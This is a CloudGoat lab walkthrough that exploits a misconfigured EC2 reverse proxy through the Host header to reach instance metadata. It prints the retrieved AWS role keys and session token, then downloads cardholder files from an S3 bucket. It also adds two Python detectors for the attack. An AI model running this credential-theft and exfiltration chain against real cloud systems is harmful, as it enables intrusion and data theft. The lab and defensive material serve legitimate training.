[Offensive security] Let’s steal the confidential files from the misconfigured S3 bucket.
What we will do in this article
1: set up an initial environment using Docker
2: steal the confidential files from the misconfigured S3 bucket.
Overview
Starting as an anonymous outsider with no access or privileges, exploit a misconfigured reverse-proxy server to query the EC2 metadata service and acquire instance profile keys. Then, use those keys to discover, access, and exfiltrate sensitive data from an S3 bucket.
1: set up an initial environment using Docker
Please see how to set up the initial environment here.
Scenario: cloud_breach_s3
Starting point: the IP address of an EC2 server that is running a misconfigured reverse proxy.
Command: $ ./cloudgoat.py create cloud_breach_s3
Scenario Goal
Download the confidential files from the S3 bucket.
What we know now
cloudgoat_output_aws_account_id = "362364726861"
cloudgoat_output_target_ec2_server_ip = "54.166.247.74"
DEMO
First, let's see what information the server gives us with a plain request:
bash-5.1# curl http://54.166.247.74
<h1>This server is configured to proxy requests to the EC2 metadata service. Please modify your request's 'host' header and try again.</h1>
bash-5.1#
The server tells us exactly what it does: it forwards requests to whatever host we name. Let's set the request's Host header to the metadata service address:
bash-5.1# curl http://54.166.247.74 -H 'Host:169.254.169.254'
1.0
2007-01-19
2007-03-01
2007-08-29
2007-10-10
2007-12-15
2008-02-01
2008-09-01
2009-04-04
2011-01-01
2011-05-01
2012-01-12
2014-02-25
2014-11-05
2015-10-20
2016-04-19
2016-06-30
2016-09-02
2018-03-28
2018-08-17
2018-09-24
2019-10-01
2020-10-27
2021-01-03
2021-03-23
2021-07-15
The proxy forwards our request straight to the EC2 metadata service. Let's ask it which IAM role is attached to the instance:
bash-5.1# curl http://54.166.247.74/latest/meta-data/iam/security-credentials/ -H 'Host:169.254.169.254'
cg-banking-WAF-Role-cgid3qq26zlbnk
bash-5.1#
We now have the IAM role name. Let's fetch the temporary credentials for this role:
bash-5.1# curl http://54.166.247.74/latest/meta-data/iam/security-credentials/cg-banking-WAF-Role-cgid3qq26zlbnk -H 'Host:169.254.169.254'
{
"Code" : "Success",
"LastUpdated" : "2022-01-17T20:26:57Z",
"Type" : "AWS-HMAC",
"AccessKeyId" : "ASIAVIXU65ZGWME5OYV3",
"SecretAccessKey" : "FBONy6v+wJatW3akJodEX3D1I1txstAlnLIJbdCd",
"Token" : "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",
"Expiration" : "2022-01-18T03:02:32Z"
}
bash-5.1#
The specially crafted curl command succeeds, returning the Access Key ID, Secret Access Key and Session Token of the IAM instance profile attached to the EC2 instance.
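Every step of the exchange above passes through the reverse proxy, so its access log is the place a defender can catch it. The root cause is a proxy that uses the client-supplied Host header to pick its upstream; the detection below is the complementary control. The following Python is an added example, not code from the original post or from the CloudGoat project. It assumes an nginx-style access log format with the Host header appended as the last quoted field (the log lines are constructed for this example) and flags requests whose Host header points at the metadata service (169.254.169.254, the IPv6 address fd00:ec2::254, the legacy instance-data hostname, or any link-local address) or whose path asks for role credentials, user-data or an IMDSv2 token.

```python
import ipaddress
import re

# Constructed sample lines in an assumed nginx-style access log format
# (a log_format with the Host header appended as the last quoted field):
#   client - - [time] "METHOD path PROTO" status bytes "host_header"
SAMPLE_LOG = """\
198.51.100.7 - - [17/Jan/2022:20:30:01 +0000] "GET / HTTP/1.1" 200 142 "54.166.247.74"
198.51.100.7 - - [17/Jan/2022:20:30:05 +0000] "GET / HTTP/1.1" 200 312 "169.254.169.254"
198.51.100.7 - - [17/Jan/2022:20:30:09 +0000] "GET /latest/meta-data/iam/security-credentials/ HTTP/1.1" 200 40 "169.254.169.254"
203.0.113.9 - - [17/Jan/2022:20:31:00 +0000] "GET /healthz HTTP/1.1" 200 2 "banking.example"
203.0.113.9 - - [17/Jan/2022:20:31:30 +0000] "GET /latest/meta-data/ HTTP/1.1" 200 900 "instance-data:80"
"""

LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ "(?P<host>[^"]*)"$'
)

# Names and addresses the EC2 metadata service answers to.
IMDS_HOSTNAMES = {"instance-data", "instance-data.ec2.internal"}
IMDS_IPV6 = ipaddress.ip_address("fd00:ec2::254")

# Metadata paths that hand out secrets (role credentials, user-data, IMDSv2 tokens).
SENSITIVE_PATHS = (
    "/latest/meta-data/iam/security-credentials",
    "/latest/user-data",
    "/latest/api/token",
)


def _strip_port(host: str) -> str:
    """Remove an optional :port from a Host header value, handling [v6]:port too."""
    if host.startswith("["):
        return host[1:].split("]", 1)[0]
    if host.count(":") == 1:
        return host.split(":", 1)[0]
    return host


def is_imds_host(host: str) -> bool:
    """True if the Host header points at the metadata service or any link-local address."""
    host = _strip_port(host.strip().lower())
    if host in IMDS_HOSTNAMES:
        return True
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return False  # a normal hostname
    return addr.is_link_local or addr == IMDS_IPV6


def classify(entry: dict) -> list:
    """Return the reasons a parsed request looks like a proxied IMDS access."""
    reasons = []
    if is_imds_host(entry["host"]):
        reasons.append("host header targets IMDS")
    if entry["path"].startswith(SENSITIVE_PATHS):
        reasons.append("sensitive metadata path")
    elif entry["path"].startswith("/latest/"):
        reasons.append("metadata path")
    return reasons


def scan_log(text: str) -> list:
    """Parse access log text and return one finding per suspicious request."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not in the expected format; skip rather than guess
        entry = m.groupdict()
        reasons = classify(entry)
        if reasons:
            findings.append({**entry, "reasons": reasons})
    return findings


def scan_sample() -> list:
    """Run the detector over the constructed sample log."""
    return scan_log(SAMPLE_LOG)


if __name__ == "__main__":
    for f in scan_sample():
        print(f["time"], f["client"], f["host"], f["path"], "->", "; ".join(f["reasons"]))
```

Run against the sample, three of the five lines are flagged: the probe with only the Host header changed, the credentials request, and a request that reached the metadata root through the legacy hostname. A reverse proxy that forwards to a fixed upstream never produces the first kind of line at all, which is the fix this detector exists to confirm.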
Let's use the stolen credentials. aws configure does not prompt for the session token, so after creating the profile we add it to ~/.aws/credentials by hand:
bash-5.1# aws configure --profile hacker
AWS Access Key ID [None]: ASIAVIXU65ZGWME5OYV3
AWS Secret Access Key [None]: FBONy6v+wJatW3akJodEX3D1I1txstAlnLIJbdCd
Default region name [None]:
Default output format [None]:
bash-5.1# vi ~/.aws/credentials
aws_session_token = IQoJb3JpZ2luX2VjEK3//////////wEaCXVzLWVhc3QtMSJHMEUCIETZRIuKV4k3FwBtOljx7ZkO/wbgub6zFDlCVlRpyJRqAiEAxJe9zYCizyRgWe7k++V2Sd08P8/LzngysPfzVtdQLJAqgwQIxv//////////ARAAGgwzNjIzNjQ3MjY4NjEiDKaDQQ5lh/+OwODvcSrXA8xo7tQ/5AMDZg/2LO6Y0DFsz87CW50rOXdwAE4Iv1wuCIAvw7ejWOP4FUdPLdaBiF9/MJqALVsyPnj1pdkF0aCUNmNqbq04PWVtvCf7nSm0/AzrdgWinHkqzuMbmr9LViZ38oR7foZGLsD1A795vF6SUF6RdKYE7/4FeeQa8BWNaRGIt5EqViOjpeJdt7Z8lUqeUjhsrW8asrdOA38E9x59x9M1yU+BSqwkcObNnKdTZ8wMkG//axps1t6E5knyeDaRCKavNS8Zt2omNrvMWSKxS6tYKoMhwP/+cNeW8qdg2pRH3Ye5Zls0w2Rj9K7Fb8hYRSmxcSxlozlEidxP06HmfCOf57i6i1+S7g0pQ8lig2h/iULPsiW2RgyJtMmSg3epPXhxCPw0S9IKKJ9LRIeeiNh9BkD5rImXLjNuz2Sa5Ycs1Hq0+wimoNf3vOktWwO2L+R40+Utms6/C25fMhOn4ZiNeJryNO8tZIpb5kGxr1pLPpKI2eZIhkT7ElVIkGP9ZQiAE6Xmv/qSXDLso4aQU9DLWjUkgulGytZM9dQJ9n3OF6ZOTR/SR7g1aM5ia5qVeCVnLloQfrGL7lI3m9LXu4EL7YCT0FixosFzHXxp3m77u3MEBzC0opePBjqlAeQ/2FiLQQMAOJTEZXY7+lVgCIiC45GQY/s4roJ8ZcBT23r56YtyQGSufICoj9fxIQNlDkk/ASRcRGXgjtB2v5qk35jV220kb3X7ub+leexre8/euiXzEy/4hpIueQHnFgROK6x9ox8Ihy3XAuf+63ybQFAZseAHHQ+7ZVPqedyyERNWvwEHvCw6jDImd9jQXXMkFXHVCiZEXYmqL93Oju5Tf8sAxQ==
With the IAM role’s credentials in hand, we are now able to explore the victim’s cloud environment using the powerful permissions granted to the role.
Now we can list the S3 buckets the role can see:
bash-5.1# aws s3 ls --profile hacker
2022-01-17 20:26:55 cg-cardholder-data-bucket-cgid3qq26zlbnk
bash-5.1# aws s3 sync s3://cg-cardholder-data-bucket-cgid3qq26zlbnk . --profile hacker
download: s3://cg-cardholder-data-bucket-cgid3qq26zlbnk/cardholder_data_primary.csv to ./cardholder_data_primary.csv
download: s3://cg-cardholder-data-bucket-cgid3qq26zlbnk/cardholder_data_secondary.csv to ./cardholder_data_secondary.csv
download: s3://cg-cardholder-data-bucket-cgid3qq26zlbnk/cardholders_corporate.csv to ./cardholders_corporate.csv
download: s3://cg-cardholder-data-bucket-cgid3qq26zlbnk/goat.png to ./goat.png
We downloaded the confidential cardholder files from the S3 bucket. Let's look at one of them:
bash-5.1# cat cardholder_data_primary.csv
ssn,id,first_name,last_name,email,gender,ip_address,address,city,state,zip
287-43-8531,1,Coo
Yes, we did it!!
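Everything from aws configure onward shows up in CloudTrail, and it carries a tell a defender can use: credentials issued to an instance profile have the instance id as their role session name, so any call made with them from an address that is not the instance's own is a strong exfiltration signal (the idea behind GuardDuty's InstanceCredentialExfiltration findings). The Python below is an added example, not code from the original post or from the CloudGoat project. The account id, role name, bucket name and instance public IP are taken from the scenario above; the instance id, the outsider's address, the access key ids and the inventory of expected source addresses are constructed assumptions for the example.

```python
import json
import re

# Constructed CloudTrail-style records, trimmed to the fields used here. The account id,
# role name, bucket name and instance public IP are from the scenario; the instance id,
# the outsider address 198.51.100.7 and the access key ids are made up for this example.
ROLE_ARN = "arn:aws:sts::362364726861:assumed-role/cg-banking-WAF-Role-cgid3qq26zlbnk/i-0123456789abcdef0"
SAMPLE_TRAIL = json.dumps({"Records": [
    {"eventTime": "2022-01-17T20:27:10Z", "eventSource": "ec2.amazonaws.com",
     "eventName": "DescribeInstances", "sourceIPAddress": "54.166.247.74",
     "userIdentity": {"type": "AssumedRole", "accessKeyId": "ASIAEXAMPLEKEY0000001", "arn": ROLE_ARN}},
    {"eventTime": "2022-01-17T20:35:02Z", "eventSource": "s3.amazonaws.com",
     "eventName": "ListBuckets", "sourceIPAddress": "198.51.100.7",
     "userIdentity": {"type": "AssumedRole", "accessKeyId": "ASIAEXAMPLEKEY0000001", "arn": ROLE_ARN}},
    {"eventTime": "2022-01-17T20:35:40Z", "eventSource": "s3.amazonaws.com",
     "eventName": "GetObject", "sourceIPAddress": "198.51.100.7",
     "requestParameters": {"bucketName": "cg-cardholder-data-bucket-cgid3qq26zlbnk",
                           "key": "cardholder_data_primary.csv"},
     "userIdentity": {"type": "AssumedRole", "accessKeyId": "ASIAEXAMPLEKEY0000001", "arn": ROLE_ARN}},
    {"eventTime": "2022-01-17T20:40:00Z", "eventSource": "s3.amazonaws.com",
     "eventName": "ListBuckets", "sourceIPAddress": "203.0.113.9",
     "userIdentity": {"type": "AssumedRole", "accessKeyId": "ASIAEXAMPLEKEY0000002",
                      "arn": "arn:aws:sts::362364726861:assumed-role/AdminRole/alice"}},
]})

# Assumed inventory: the source addresses each instance's API calls are expected to come
# from (its public IP here; a NAT gateway or VPC endpoint address in other designs).
INSTANCE_SOURCES = {"i-0123456789abcdef0": {"54.166.247.74"}}

INSTANCE_ID_RE = re.compile(r"^i-[0-9a-f]{8,17}$")


def instance_id_from_arn(arn: str):
    """Instance-profile credentials use the instance id as the role session name."""
    session = arn.rsplit("/", 1)[-1]
    return session if INSTANCE_ID_RE.match(session) else None


def find_credential_misuse(trail_json: str, inventory: dict) -> list:
    """Flag calls made with an instance's role credentials from an unexpected source."""
    findings = []
    for rec in json.loads(trail_json)["Records"]:
        ident = rec.get("userIdentity", {})
        if ident.get("type") != "AssumedRole":
            continue
        instance = instance_id_from_arn(ident.get("arn", ""))
        if instance is None:
            continue  # a human or service session, not an instance profile
        src = rec.get("sourceIPAddress", "")
        if src.endswith(".amazonaws.com"):
            continue  # calls an AWS service makes on the instance's behalf
        if src in inventory.get(instance, set()):
            continue  # the instance itself
        findings.append({
            "time": rec["eventTime"],
            "instance": instance,
            "accessKeyId": ident.get("accessKeyId"),
            "sourceIPAddress": src,
            "event": rec["eventName"],
            "bucket": rec.get("requestParameters", {}).get("bucketName"),
        })
    return findings


def scan_sample() -> list:
    """Run the detector over the constructed sample trail."""
    return find_credential_misuse(SAMPLE_TRAIL, INSTANCE_SOURCES)


if __name__ == "__main__":
    for f in scan_sample():
        print(f["time"], f["instance"], f["accessKeyId"], "from", f["sourceIPAddress"],
              f["event"], f["bucket"] or "")
```

On the sample, the instance's own DescribeInstances call and the human AdminRole session pass, while the ListBuckets and GetObject calls made from the outsider's address with the instance's key are reported, naming the bucket that was read. The same key id appearing from two different source addresses within minutes is the pattern to alert on; the matching response is to revoke the role's active sessions and fix the proxy.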
Cleanup
bash-5.1# ./cloudgoat.py destroy cloud_breach_s3